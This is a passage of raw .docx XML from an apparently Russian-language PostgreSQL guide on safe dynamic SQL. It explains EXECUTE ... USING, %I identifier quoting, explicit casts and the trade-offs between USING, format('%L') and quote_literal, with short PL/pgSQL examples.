        <w:t xml:space="preserve">-- ПРАВИЛЬНО: %I для identifier + USING для values</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app.proper_find(tbl_name text, search text)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RETURNS SETOF record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RETURN QUERY EXECUTE format(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        'SELECT * FROM %I WHERE name = $1',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        tbl_name</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    ) USING search;</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pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Использование USING — детали</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">USING принимает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">arbitrary number of values</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, привязанных к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в SQL-string. Типы выводятся PostgreSQL из declared signature функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">или</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через явные CAST в SQL-string:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Implicit type из function signature</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE 'SELECT * FROM t WHERE id = $1 AND active = $2'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">USING row_id, is_active;  -- row_id: int, is_active: boolean (from declaration)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Explicit cast в SQL для безопасности</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE 'SELECT * FROM t WHERE id = $1::int AND created_at &gt;= $2::date'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">USING row_id, since_str;  -- cast гарантирует type</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Explicit cast (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$1::int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">defence-in-depth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: даже если caller передал wrong-type, SQL-side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принудит type или упадёт с invalid input syntax (что желательно — лучше падать, чем silently ошибочный поиск).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">USING </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не поддерживает identifier даже через CAST</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НЕ РАБОТАЕТ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE 'SELECT * FROM $1::regclass' USING tbl_name;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ERROR: syntax error at or near "$1" (regclass всё равно identifier-context)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$1::regclass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> интерпретируется как «значение типа regclass» — это oid идентификатора таблицы, не имя. Если caller передаст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$1::regclass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> cast-нет text → regclass (lookup oid таблицы), и SQL станет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM &lt;oid_of_users&gt;</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работает в WHERE-position</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (regclass — value-type), но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не в FROM-position</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (FROM ожидает identifier-token).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Сравнение: USING vs format('%L') vs `||`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для значения три способа:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- 1. USING (РЕКОМЕНДАЦИЯ)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE 'SELECT * FROM t WHERE n = $1' USING value;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ↑ bind, безопасно</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-- 2. format('%L', value)  (приемлемо, но менее эффективно)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE format('SELECT * FROM t WHERE n = %L', value);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ↑ value embedded в SQL-text через quote_literal — безопасно, но</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ↑ SQL парсится с literal внутри (плохо для plan cache)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-- 3. || quote_literal(value)  (приемлемо, legacy)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE 'SELECT * FROM t WHERE n = ' || quote_literal(value);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ↑ функционально как format('%L', ...), стиль старее</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Различия: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USING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — bind via extended protocol, value не попадает в SQL-text → одна prepared statement reusable для разных values (plan cache benefit).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format('%L')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 value embedded в SQL-text → новый plan per каждое value, медленнее на repeated calls.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 without quote_literal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">уязвимо</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3.16.4).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">USING — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">default choice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для значений. Use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">%L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только когда USING невозможен (например, для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без INTO в loop, или для построения VIEW DDL).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Edge case — USING внутри loop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Pattern: dynamic SQL в loop с разными identifier, общим value-binding</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app.search_across(target text)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RETURNS TABLE(tbl text, found_count bigint)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rec record;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    cnt bigint;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FOR rec IN SELECT table_name FROM information_schema.tables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">               WHERE table_schema = 'public' AND table_type = 'BASE TABLE'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    LOOP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        EXECUTE format('SELECT count(*) FROM %I WHERE description ILIKE $1', rec.table_name)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            INTO cnt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            USING '%' || target || '%';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
